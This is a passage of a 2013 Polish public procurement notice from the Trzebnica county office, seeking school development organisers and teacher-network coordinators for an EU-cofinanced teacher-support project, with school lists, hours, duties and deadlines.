ul. Ks. Dz. W. Bochenka 6
55-100 Trzebnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.10.2013 godzina 13:00, miejsce: Starostwo Powiatowe w Trzebnicy przy 
ul. Ks. Dz. W. Bochenka 6
55-100 Trzebnica, 
sekretariat na pierwszym piętrze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach projektu Nauczyciel na 6 - wsparcie szkół/przedszkoli i nauczycieli z terenu powiatu trzebnickiego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1. SORE I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> SORE I obejmuje wykonanie usługi w następujących placówkach:
1)	Gimnazjum w Pęgowie (w roku szkolnym 2013/2014)
2)	Szkoła Podstawowa w Osolinie im. Jana Brzechwy (w roku szkolnym 2014/2015)
3)	Gimnazjum w Obornikach Śląskich im. Polskich Laureatów Nagrody Nobla (w roku szkolnym 2013/2014)
4)	Szkoła Podstawowa Nr 2 w Obornikach Śląskich im. ppor. Józefa Krysińskiego (w roku szkolnym 2013/2014)
5)	Szkoła Podstawowa Nr 3 w Obornikach Śląskich im. Jana Pawła II (w roku szkolnym 2014/2015)
6)	Publiczne Przedszkole w Obornikach Śląskich (w roku szkolnym 2014/2015)
7)	Publiczne Przedszkole w Pęgowie (w roku szkolnym 2014/2015)
8)	Szkoła Podstawowa w Pęgowie im. Adama Mickiewicza (w roku szkolnym 2013/2014)

5.	Szkolny organizator rozwoju edukacji (dalej SORE) jest zewnętrznym specjalistą, który pracuje na rzecz 7-8 szkół/przedszkoli z terenu powiatu trzebnickiego w ramach realizowanego projektu.  
a) Szacunkowa ilość godzin dla każdego SORE: 40 godzin lekcyjnych miesięcznie x 21 miesięcy (od 01.11.2013 r. do 31.07.2015 r.).
b) Kalkulacja miesięczna godzin: średnio 2 godziny lekcyjne w placówce oświatowej tygodniowo x 2 placówki oświatowe w tygodniu = 4 godziny lekcyjne w 2 placówkach tygodniowo + średnio 6 godzin lekcyjnych tygodniowo na dokumentację SORE, tj. średnio 10 godzin lekcyjnych tygodniowo x 4 tygodnie = średnio 40 godzin lekcyjnych pracy SORE w miesiącu.
c) Głównym zadaniem SORE jest wspieranie dyrektora i nauczycieli danej placówki oświatowej w przygotowaniu i realizacji rocznego planu wspomagania (RPW) zbudowanego na podstawie wybranej przez szkołę/przedszkole oferty doskonalenia (przygotowanej w ramach projektu ORE System doskonalenia nauczycieli oparty na ogólnodostępnym kompleksowym wspomaganiu szkół). SORE wspiera szkołę/przedszkole i dyrektora, towarzysząc oraz służąc pomocą na kolejnych etapach przygotowania i realizacji planu wspomagania. Po uruchomieniu projektu SORE nawiązuje kontakt ze szkołą/przedszkolem, buduje relacje z dyrektorem i radą pedagogiczną. Współpracuje z dyrektorem i radą pedagogiczną w przeprowadzeniu diagnozy i konstruowaniu rocznego planu wspomagania. Odpowiada za prawidłową organizację działań związanych z zewnętrznym wspomaganiem. Pozostaje w stałym kontakcie z dyrektorem i pracownikami zaangażowanymi w realizację rocznego planu wspomagania. Wspiera nauczycieli w czasie wdrażania nowych umiejętności i wypracowanych procedur. Swoje działania realizuje bezpośrednio w placówce oświatowej, którą wspiera. Obowiązki swoje realizuje z zachowaniem zasad określonych w Poradniku dla beneficjenta (wyd. dotyczące konkursu nr 1/POKL/3.5/2012).
d) Obowiązki SORE:
1)	pomaganie dyrektorowi w zdiagnozowaniu potrzeb szkoły/przedszkola,
2)	pomaganie w formułowaniu celów wynikających ze zdiagnozowanych potrzeb i określeniu obszaru do rozwoju - współpraca z radą pedagogiczną,
3)	wsparcie szkoły w przygotowaniu rocznego planu wspomagania ściśle odpowiadającego na potrzeby szkoły i zbudowanego na podstawie jednej z ofert doskonalenia (przeprowadzenie warsztatu diagnostyczno-rozwojowego),
4)	wsparcie przy zapewnianiu obiegu informacji (stały kontakt z osobami zaangażowanymi w realizację RPW, dbanie o przepływ informacji dotyczących działań podejmowanych w ramach jego współpracy ze szkołą),
5)	wnioskowanie o pozyskanie zewnętrznych ekspertów (jeśli zaistnieje taka potrzeba),
6)	organizowanie zaplanowanych form wspomagania - we współpracy ze szkołą,
7)	organizowanie systemu wsparcia dla pracowników szkoły we wdrażaniu nowo nabytych umiejętności i wypracowanych procedur (np. organizacja i prowadzenie konsultacji),
8)	monitorowanie przebiegu realizacji rocznego planu wspomagania, reagowanie na pojawiające się trudności,
9)	dokumentowanie podejmowanych działań (zgodnie z wymogami określonymi przez Ośrodek Rozwoju Edukacji oraz Zamawiającego - Powiat Trzebnicki),
10)	przygotowanie i przeprowadzenie wśród pracowników szkoły ankiet z przebiegu wspomagania,
11)	przygotowanie sprawozdania z przebiegu realizacji rocznego planu wspomagania,
12)	przedstawienie sprawozdania z przebiegu realizacji rocznego planu wspomagania dyrektorowi szkoły oraz radzie pedagogicznej,
13)	udział w podsumowaniu podjętych działań - współpraca z radą pedagogiczną nad rekomendacjami do pracy szkoły w kolejnym roku szkolnym,
14)	ścisła współpraca z Koordynatorem projektu oraz członkami Zespołu projektowego,
15)	współpraca z Powiatowym Ośrodkiem Doradztwa Metodyczno-Programowego w Trzebnicy,
16)	oznaczanie wszystkich dokumentów związanych z projektem logotypami POKL, UE, Europejskiego Funduszu Społecznego i Powiatu Trzebnickiego (herb),
17)	sporządzanie miesięcznej karty czasu pracy.
e) Do wynagrodzenia za miesiąc wykonywania przedmiotu zamówienia Wykonawca winien wliczyć koszty dojazdów do placówek (delegacje), które będzie zobowiązany wykazać w kartach pracy za dany miesiąc. 
f) W przypadku realizacji zadań przez Wykonawcę w innym projekcie w ramach Narodowych Strategicznych Ram Odniesienia Zamawiający wymaga, aby obciążenie wynikające z powyższego nie wykluczało możliwości prawidłowej i efektywnej realizacji wszystkich zadań powierzonych w ramach przedmiotu zamówienia a łączne zaangażowanie w realizację zadań powierzonych w ramach przedmiotu zamówienia nie przekraczało 240 godzin miesięcznie (na potwierdzenie powyższego wymaga się podpisania stosownego oświadczenia na etapie podpisania umowy na realizację zadania)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2. SORE II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> SORE II obejmuje wykonanie usługi w następujących placówkach:
1)	Liceum Ogólnokształcące w Trzebnicy (w roku szkolnym 2013/2014)
2)	Zasadnicza Szkoła Zawodowa w Trzebnicy (w roku szkolnym 2014/2015)
3)	Technikum w Trzebnicy (w roku szkolnym 2013/2014)
4)	Gimnazjum Nr 1 w Trzebnicy im. Księcia Henryka Brodatego (w roku szkolnym 2013/2014)
5)	Szkoła Podstawowa w Krynicznie (w roku szkolnym 2014/2015)
6)	Szkoła Podstawowa im. H. Sienkiewicza w Prusicach (w roku szkolnym 2013/2014)
7)	Gimnazjum im. H. Sienkiewicza w Prusicach (w roku szkolnym 2014/2015)

5.	Szkolny organizator rozwoju edukacji (dalej SORE) jest zewnętrznym specjalistą, który pracuje na rzecz 7-8 szkół/przedszkoli z terenu powiatu trzebnickiego w ramach realizowanego projektu.  
a) Szacunkowa ilość godzin dla każdego SORE: 40 godzin lekcyjnych miesięcznie x 21 miesięcy (od 01.11.2013 r. do 31.07.2015 r.).
b) Kalkulacja miesięczna godzin: średnio 2 godziny lekcyjne w placówce oświatowej tygodniowo x 2 placówki oświatowe w tygodniu = 4 godziny lekcyjne w 2 placówkach tygodniowo + średnio 6 godzin lekcyjnych tygodniowo na dokumentację SORE, tj. średnio 10 godzin lekcyjnych tygodniowo x 4 tygodnie = średnio 40 godzin lekcyjnych pracy SORE w miesiącu.
c) Głównym zadaniem SORE jest wspieranie dyrektora i nauczycieli danej placówki oświatowej w przygotowaniu i realizacji rocznego planu wspomagania (RPW) zbudowanego na podstawie wybranej przez szkołę/przedszkole oferty doskonalenia (przygotowanej w ramach projektu ORE System doskonalenia nauczycieli oparty na ogólnodostępnym kompleksowym wspomaganiu szkół). SORE wspiera szkołę/przedszkole i dyrektora, towarzysząc oraz służąc pomocą na kolejnych etapach przygotowania i realizacji planu wspomagania. Po uruchomieniu projektu SORE nawiązuje kontakt ze szkołą/przedszkolem, buduje relacje z dyrektorem i radą pedagogiczną. Współpracuje z dyrektorem i radą pedagogiczną w przeprowadzeniu diagnozy i konstruowaniu rocznego planu wspomagania. Odpowiada za prawidłową organizację działań związanych z zewnętrznym wspomaganiem. Pozostaje w stałym kontakcie z dyrektorem i pracownikami zaangażowanymi w realizację rocznego planu wspomagania. Wspiera nauczycieli w czasie wdrażania nowych umiejętności i wypracowanych procedur. Swoje działania realizuje bezpośrednio w placówce oświatowej, którą wspiera. Obowiązki swoje realizuje z zachowaniem zasad określonych w Poradniku dla beneficjenta (wyd. dotyczące konkursu nr 1/POKL/3.5/2012).
d) Obowiązki SORE:
1)	pomaganie dyrektorowi w zdiagnozowaniu potrzeb szkoły/przedszkola,
2)	pomaganie w formułowaniu celów wynikających ze zdiagnozowanych potrzeb i określeniu obszaru do rozwoju - współpraca z radą pedagogiczną,
3)	wsparcie szkoły w przygotowaniu rocznego planu wspomagania ściśle odpowiadającego na potrzeby szkoły i zbudowanego na podstawie jednej z ofert doskonalenia (przeprowadzenie warsztatu diagnostyczno-rozwojowego),
4)	wsparcie przy zapewnianiu obiegu informacji (stały kontakt z osobami zaangażowanymi w realizację RPW, dbanie o przepływ informacji dotyczących działań podejmowanych w ramach jego współpracy ze szkołą),
5)	wnioskowanie o pozyskanie zewnętrznych ekspertów (jeśli zaistnieje taka potrzeba),
6)	organizowanie zaplanowanych form wspomagania - we współpracy ze szkołą,
7)	organizowanie systemu wsparcia dla pracowników szkoły we wdrażaniu nowo nabytych umiejętności i wypracowanych procedur (np. organizacja i prowadzenie konsultacji),
8)	monitorowanie przebiegu realizacji rocznego planu wspomagania, reagowanie na pojawiające się trudności,
9)	dokumentowanie podejmowanych działań (zgodnie z wymogami określonymi przez Ośrodek Rozwoju Edukacji oraz Zamawiającego - Powiat Trzebnicki),
10)	przygotowanie i przeprowadzenie wśród pracowników szkoły ankiet z przebiegu wspomagania,
11)	przygotowanie sprawozdania z przebiegu realizacji rocznego planu wspomagania,
12)	przedstawienie sprawozdania z przebiegu realizacji rocznego planu wspomagania dyrektorowi szkoły oraz radzie pedagogicznej,
13)	udział w podsumowaniu podjętych działań - współpraca z radą pedagogiczną nad rekomendacjami do pracy szkoły w kolejnym roku szkolnym,
14)	ścisła współpraca z Koordynatorem projektu oraz członkami Zespołu projektowego,
15)	współpraca z Powiatowym Ośrodkiem Doradztwa Metodyczno-Programowego w Trzebnicy,
16)	oznaczanie wszystkich dokumentów związanych z projektem logotypami POKL, UE, Europejskiego Funduszu Społecznego i Powiatu Trzebnickiego (herb),
17)	sporządzanie miesięcznej karty czasu pracy.
e) Do wynagrodzenia za miesiąc wykonywania przedmiotu zamówienia Wykonawca winien wliczyć koszty dojazdów do placówek (delegacje), które będzie zobowiązany wykazać w kartach pracy za dany miesiąc. 
f) W przypadku realizacji zadań przez Wykonawcę w innym projekcie w ramach Narodowych Strategicznych Ram Odniesienia Zamawiający wymaga, aby obciążenie wynikające z powyższego nie wykluczało możliwości prawidłowej i efektywnej realizacji wszystkich zadań powierzonych w ramach przedmiotu zamówienia a łączne zaangażowanie w realizację zadań powierzonych w ramach przedmiotu zamówienia nie przekraczało 240 godzin miesięcznie (na potwierdzenie powyższego wymaga się podpisania stosownego oświadczenia na etapie podpisania umowy na realizację zadania)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część 3. SORE III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> SORE III obejmuje wykonanie usługi w następujących placówkach:
1)	Szkoła Podstawowa w Żmigrodzie im. Bolesława Chrobrego (w roku szkolnym 2013/2014)
2)	Gimnazjum w Czeszowie im. ks. Wawrzyńca Bochenka (w roku szkolnym 2014/2015)
3)	Szkoła Podstawowa w Psarach im. Jana Pawła II (w roku szkolnym 2013/2014)
4)	Technikum w Żmigrodzie (w roku szkolnym 2013/2014)
5)	Zasadnicza Szkoła Zawodowa w Żmigrodzie (w roku szkolnym 2014/2015)
6)	Szkoła Podstawowa w Korzeńsku im. Polskich Olimpijczyków (w roku szkolnym 2014/2015)
7)	Szkoła Podstawowa w Szewcach (w roku szkolnym 2014/2015)
8)	Gimnazjum w Szewcach (w roku szkolnym 2013/2014).

5.	Szkolny organizator rozwoju edukacji (dalej SORE) jest zewnętrznym specjalistą, który pracuje na rzecz 7-8 szkół/przedszkoli z terenu powiatu trzebnickiego w ramach realizowanego projektu.  
a) Szacunkowa ilość godzin dla każdego SORE: 40 godzin lekcyjnych miesięcznie x 21 miesięcy (od 01.11.2013 r. do 31.07.2015 r.).
b) Kalkulacja miesięczna godzin: średnio 2 godziny lekcyjne w placówce oświatowej tygodniowo x 2 placówki oświatowe w tygodniu = 4 godziny lekcyjne w 2 placówkach tygodniowo + średnio 6 godzin lekcyjnych tygodniowo na dokumentację SORE, tj. średnio 10 godzin lekcyjnych tygodniowo x 4 tygodnie = średnio 40 godzin lekcyjnych pracy SORE w miesiącu.
c) Głównym zadaniem SORE jest wspieranie dyrektora i nauczycieli danej placówki oświatowej w przygotowaniu i realizacji rocznego planu wspomagania (RPW) zbudowanego na podstawie wybranej przez szkołę/przedszkole oferty doskonalenia (przygotowanej w ramach projektu ORE System doskonalenia nauczycieli oparty na ogólnodostępnym kompleksowym wspomaganiu szkół). SORE wspiera szkołę/przedszkole i dyrektora, towarzysząc oraz służąc pomocą na kolejnych etapach przygotowania i realizacji planu wspomagania. Po uruchomieniu projektu SORE nawiązuje kontakt ze szkołą/przedszkolem, buduje relacje z dyrektorem i radą pedagogiczną. Współpracuje z dyrektorem i radą pedagogiczną w przeprowadzeniu diagnozy i konstruowaniu rocznego planu wspomagania. Odpowiada za prawidłową organizację działań związanych z zewnętrznym wspomaganiem. Pozostaje w stałym kontakcie z dyrektorem i pracownikami zaangażowanymi w realizację rocznego planu wspomagania. Wspiera nauczycieli w czasie wdrażania nowych umiejętności i wypracowanych procedur. Swoje działania realizuje bezpośrednio w placówce oświatowej, którą wspiera. Obowiązki swoje realizuje z zachowaniem zasad określonych w Poradniku dla beneficjenta (wyd. dotyczące konkursu nr 1/POKL/3.5/2012).
d) Obowiązki SORE:
1)	pomaganie dyrektorowi w zdiagnozowaniu potrzeb szkoły/przedszkola,
2)	pomaganie w formułowaniu celów wynikających ze zdiagnozowanych potrzeb i określeniu obszaru do rozwoju - współpraca z radą pedagogiczną,
3)	wsparcie szkoły w przygotowaniu rocznego planu wspomagania ściśle odpowiadającego na potrzeby szkoły i zbudowanego na podstawie jednej z ofert doskonalenia (przeprowadzenie warsztatu diagnostyczno-rozwojowego),
4)	wsparcie przy zapewnianiu obiegu informacji (stały kontakt z osobami zaangażowanymi w realizację RPW, dbanie o przepływ informacji dotyczących działań podejmowanych w ramach jego współpracy ze szkołą),
5)	wnioskowanie o pozyskanie zewnętrznych ekspertów (jeśli zaistnieje taka potrzeba),
6)	organizowanie zaplanowanych form wspomagania - we współpracy ze szkołą,
7)	organizowanie systemu wsparcia dla pracowników szkoły we wdrażaniu nowo nabytych umiejętności i wypracowanych procedur (np. organizacja i prowadzenie konsultacji),
8)	monitorowanie przebiegu realizacji rocznego planu wspomagania, reagowanie na pojawiające się trudności,
9)	dokumentowanie podejmowanych działań (zgodnie z wymogami określonymi przez Ośrodek Rozwoju Edukacji oraz Zamawiającego - Powiat Trzebnicki),
10)	przygotowanie i przeprowadzenie wśród pracowników szkoły ankiet z przebiegu wspomagania,
11)	przygotowanie sprawozdania z przebiegu realizacji rocznego planu wspomagania,
12)	przedstawienie sprawozdania z przebiegu realizacji rocznego planu wspomagania dyrektorowi szkoły oraz radzie pedagogicznej,
13)	udział w podsumowaniu podjętych działań - współpraca z radą pedagogiczną nad rekomendacjami do pracy szkoły w kolejnym roku szkolnym,
14)	ścisła współpraca z Koordynatorem projektu oraz członkami Zespołu projektowego,
15)	współpraca z Powiatowym Ośrodkiem Doradztwa Metodyczno-Programowego w Trzebnicy,
16)	oznaczanie wszystkich dokumentów związanych z projektem logotypami POKL, UE, Europejskiego Funduszu Społecznego i Powiatu Trzebnickiego (herb),
17)	sporządzanie miesięcznej karty czasu pracy.
e) Do wynagrodzenia za miesiąc wykonywania przedmiotu zamówienia Wykonawca winien wliczyć koszty dojazdów do placówek (delegacje), które będzie zobowiązany wykazać w kartach pracy za dany miesiąc. 
f) W przypadku realizacji zadań przez Wykonawcę w innym projekcie w ramach Narodowych Strategicznych Ram Odniesienia Zamawiający wymaga, aby obciążenie wynikające z powyższego nie wykluczało możliwości prawidłowej i efektywnej realizacji wszystkich zadań powierzonych w ramach przedmiotu zamówienia a łączne zaangażowanie w realizację zadań powierzonych w ramach przedmiotu zamówienia nie przekraczało 240 godzin miesięcznie (na potwierdzenie powyższego wymaga się podpisania stosownego oświadczenia na etapie podpisania umowy na realizację zadania)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część 4. Koordynator nr I ds. sieci: Rola dyrektora w promocji i budowaniu wizerunku szkoły/przedszkola (w roku szkolnym 2013/2014)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 6.	Koordynator ds. sieci i doskonalenia
a)	Szacunkowa ilość godzin dla każdego koordynatora: 40 godzin lekcyjnych w projekcie.
b)	W ramach jednej sieci współpracować ze sobą będzie do 20 nauczycieli z różnych szkół i przedszkoli z terenu powiatu trzebnickiego, tj. w sumie ok. 100 nauczycieli. Uczestnicy sieci będą spotykać się przeciętnie 5 razy po 4 godziny lekcyjne w trakcie trwania projektu w ramach jednej sieci (co około 2 miesiące). Między spotkaniami nauczyciele będą pracować na platformie internetowej udostępnionej przez Ośrodek Rozwoju Edukacji. 
c)	W ramach projektu planuje się powołanie 6 sieci:
1)	1 sieć dla dyrektorów (w ramach 2 grup po 13 osób); rekrutacja do sieci: każdy dyrektor/wicedyrektor będzie uczestniczyć w sieci dla dyrektorów i wytypuje min. 1 nauczyciela do pracy w sieci problemowej i / lub tematycznej. 
2)	5 sieci przedmiotowo-problemowych - każda po ok. 20 uczestników (łącznie ok. 100 nauczycieli). 
d)	W roku szkolnym 2013/2014 obędą się 3 sieci:
-1 grupa sieci dla dyrektorów (temat sieci: Rola dyrektora w promocji i budowaniu wizerunku szkoły/przedszkola),
-2 sieci przedmiotowo-problemowe (tematy sieci: 1. Doświadczenie i eksperymenty na zajęciach z przedmiotów przyrodniczych, 2. Nauczyciele pracują zespołowo).
e)	W roku szkolnym 2014/2015 odbędą się 4 sieci:
-1 grupa sieci dla dyrektorów (temat sieci: Rola dyrektora w promocji i budowaniu wizerunku szkoły/przedszkola), 
-3 sieci przedmiotowo-problemowe (tematy sieci: 1. Praca z nowoczesnymi technologiami, 2. Jak rozwijać twórcze myślnie uczniów, 3. Jak wspierać dziecko w uczeniu matematyki).
f)	Koordynator przygotuje sprawozdanie z realizacji rocznego planu pracy w ramach sieci, zawierającego relację z przebiegu spotkań oraz wypracowanych rezultatów i zamieści je na platformie internetowej oraz na stronie www projektu. Współpraca będzie odbywać się również za pomocą forów wymiany doświadczeń, których moderatorem będzie koordynator.
g)	Obowiązki koordynatora ds. sieci i doskonalenia:
1)	przygotowanie planu działania sieci współpracy i samokształcenia zgodnego z potrzebami zgłoszonymi przez uczestników, harmonogramu pracy sieci;
2)	prowadzenie sieci zgodnie z wytycznymi Poradnika metodycznego dla koordynatorów sieci współpracy i samokształcenia (wyd. ORE, Kraków 2012);
3)	organizowanie i prowadzenie spotkań uczestników sieci w Powiatowym Ośrodku Doradztwa Metodyczno-Programowego w Trzebnicy oraz w Starostwie Powiatowym w Trzebnicy;
4)	wnioskowanie o pozyskanie ekspertów zewnętrznych  - specjalistów w zakresie tematu pracy sieci (jeśli zajdzie taka potrzeba);
5)	bieżące moderowanie sieci, w tym forum dyskusyjnego oraz wymiany doświadczeń dla uczestników (praca na platformie internetowej Ośrodka Rozwoju Edukacji);
6)	zamieszczanie na platformie internetowej materiałów samokształceniowych i innych zasobów edukacyjnych łączących się z tematyką sieć;
7)	sporządzenie rocznego sprawozdania z pracy sieci;
8)	promocja działań sieci;
9)	prowadzenie bieżącej dokumentacji związanej z realizacją sieci;
10)	ścisła współpraca z Asystentem koordynatora ds. sieci i doskonalenia oraz pozostałymi członkami Zespołu projektowego,
11)	współpraca z Powiatowym Ośrodkiem Doradztwa Metodyczno-Programowego w Trzebnicy;
12)	oznaczanie wszystkich dokumentów związanych z projektem logotypami POKL, UE, Europejskiego Funduszu Społecznego i Powiatu Trzebnickiego (herb).
7.	W przypadku realizacji zadań przez Wykonawcę w innym projekcie w ramach Narodowych Strategicznych Ram Odniesienia Zamawiający wymaga, aby obciążenie wynikające z powyższego nie wykluczało możliwości prawidłowej i efektywnej realizacji wszystkich zadań powierzonych w ramach przedmiotu zamówienia a łączne zaangażowanie w realizację zadań powierzonych w ramach przedmiotu zamówienia nie przekraczało 240 godzin miesięcznie (na potwierdzenie powyższego wymaga się podpisania stosownego oświadczenia na etapie podpisania umowy na realizację zadania).
8.	Ze względu na szczególną specyfikę przedmiotu zamówienia oraz koniczność optymalnego wykorzystania potencjału wykonawcy nie jest możliwe łącznie funkcji SORE z funkcjami koordynatorów. Wykonawca składający ofertę na kilka części postępowaniach nie może zgłosić tej samej osoby do pełnienia więcej niż jednej z powyższych funkcji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część 5. Koordynator nr II ds. sieci: Doświadczenie i eksperymenty na zajęciach z przedmiotów przyrodniczych (w roku szkolnym 2013/2014)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 6.	Koordynator ds. sieci i doskonalenia
a)	Szacunkowa ilość godzin dla każdego koordynatora: 40 godzin lekcyjnych w projekcie.
b)	W ramach jednej sieci współpracować ze sobą będzie do 20 nauczycieli z różnych szkół i przedszkoli z terenu powiatu trzebnickiego, tj. w sumie ok. 100 nauczycieli. Uczestnicy sieci będą spotykać się przeciętnie 5 razy po 4 godziny lekcyjne w trakcie trwania projektu w ramach jednej sieci (co około 2 miesiące). Między spotkaniami nauczyciele będą pracować na platformie internetowej udostępnionej przez Ośrodek Rozwoju Edukacji. 
c)	W ramach projektu planuje się powołanie 6 sieci:
1)	1 sieć dla dyrektorów (w ramach 2 grup po 13 osób); rekrutacja do sieci: każdy dyrektor/wicedyrektor będzie uczestniczyć w sieci dla dyrektorów i wytypuje min. 1 nauczyciela do pracy w sieci problemowej i / lub tematycznej. 
2)	5 sieci przedmiotowo-problemowych - każda po ok. 20 uczestników (łącznie ok. 100 nauczycieli). 
d)	W roku szkolnym 2013/2014 obędą się 3 sieci:
-1 grupa sieci dla dyrektorów (temat sieci: Rola dyrektora w promocji i budowaniu wizerunku szkoły/przedszkola),
-2 sieci przedmiotowo-problemowe (tematy sieci: 1. Doświadczenie i eksperymenty na zajęciach z przedmiotów przyrodniczych, 2. Nauczyciele pracują zespołowo).
e)	W roku szkolnym 2014/2015 odbędą się 4 sieci:
-1 grupa sieci dla dyrektorów (temat sieci: Rola dyrektora w promocji i budowaniu wizerunku szkoły/przedszkola), 
-3 sieci przedmiotowo-problemowe (tematy sieci: 1. Praca z nowoczesnymi technologiami, 2. Jak rozwijać twórcze myślnie uczniów, 3. Jak wspierać dziecko w uczeniu matematyki).
f)	Koordynator przygotuje sprawozdanie z realizacji rocznego planu pracy w ramach sieci, zawierającego relację z przebiegu spotkań oraz wypracowanych rezultatów i zamieści je na platformie internetowej oraz na stronie www projektu. Współpraca będzie odbywać się również za pomocą forów wymiany doświadczeń, których moderatorem będzie koordynator.
g)	Obowiązki koordynatora ds. sieci i doskonalenia:
1)	przygotowanie planu działania sieci współpracy i samokształcenia zgodnego z potrzebami zgłoszonymi przez uczestników, harmonogramu pracy sieci;
2)	prowadzenie sieci zgodnie z wytycznymi Poradnika metodycznego dla koordynatorów sieci współpracy i samokształcenia (wyd. ORE, Kraków 2012);
3)	organizowanie i prowadzenie spotkań uczestników sieci w Powiatowym Ośrodku Doradztwa Metodyczno-Programowego w Trzebnicy oraz w Starostwie Powiatowym w Trzebnicy;
4)	wnioskowanie o pozyskanie ekspertów zewnętrznych  - specjalistów w zakresie tematu pracy sieci (jeśli zajdzie taka potrzeba);
5)	bieżące moderowanie sieci, w tym forum dyskusyjnego oraz wymiany doświadczeń dla uczestników (praca na platformie internetowej Ośrodka Rozwoju Edukacji);
6)	zamieszczanie na platformie internetowej materiałów samokształceniowych i innych zasobów edukacyjnych łączących się z tematyką sieć;
7)	sporządzenie rocznego sprawozdania z pracy sieci;
8)	promocja działań sieci;
9)	prowadzenie bieżącej dokumentacji związanej z realizacją sieci;
10)	ścisła współpraca z Asystentem koordynatora ds. sieci i doskonalenia oraz pozostałymi członkami Zespołu projektowego,
11)	współpraca z Powiatowym Ośrodkiem Doradztwa Metodyczno-Programowego w Trzebnicy;
12)	oznaczanie wszystkich dokumentów związanych z projektem logotypami POKL, UE, Europejskiego Funduszu Społecznego i Powiatu Trzebnickiego (herb).
7.	W przypadku realizacji zadań przez Wykonawcę w innym projekcie w ramach Narodowych Strategicznych Ram Odniesienia Zamawiający wymaga, aby obciążenie wynikające z powyższego nie wykluczało możliwości prawidłowej i efektywnej realizacji wszystkich zadań powierzonych w ramach przedmiotu zamówienia a łączne zaangażowanie w realizację zadań powierzonych w ramach przedmiotu zamówienia nie przekraczało 240 godzin miesięcznie (na potwierdzenie powyższego wymaga się podpisania stosownego oświadczenia na etapie podpisania umowy na realizację zadania).
8.	Ze względu na szczególną specyfikę przedmiotu zamówienia oraz koniczność optymalnego wykorzystania potencjału wykonawcy nie jest możliwe łącznie funkcji SORE z funkcjami koordynatorów. Wykonawca składający ofertę na kilka części postępowaniach nie może zgłosić tej samej osoby do pełnienia więcej niż jednej z powyższych funkcji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część 6. Koordynator nr III ds. sieci: Nauczyciele pracują zespołowo (w roku szkolnym 2013/2014)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Koordynator ds. sieci i doskonalenia
a)	Szacunkowa ilość godzin dla każdego koordynatora: 40 godzin lekcyjnych w projekcie.
b)	W ramach jednej sieci współpracować ze sobą będzie do 20 nauczycieli z różnych szkół i przedszkoli z terenu powiatu trzebnickiego, tj. w sumie ok. 100 nauczycieli. Uczestnicy sieci będą spotykać się przeciętnie 5 razy po 4 godziny lekcyjne w trakcie trwania projektu w ramach jednej sieci (co około 2 miesiące). Między spotkaniami nauczyciele będą pracować na platformie internetowej udostępnionej przez Ośrodek Rozwoju Edukacji. 
c)	W ramach projektu planuje się powołanie 6 sieci:
1)	1 sieć dla dyrektorów (w ramach 2 grup po 13 osób); rekrutacja do sieci: każdy dyrektor/wicedyrektor będzie uczestniczyć w sieci dla dyrektorów i wytypuje min. 1 nauczyciela do pracy w sieci problemowej i / lub tematycznej. 
2)	5 sieci przedmiotowo-problemowych - każda po ok. 20 uczestników (łącznie ok. 100 nauczycieli). 
d)	W roku szkolnym 2013/2014 obędą się 3 sieci:
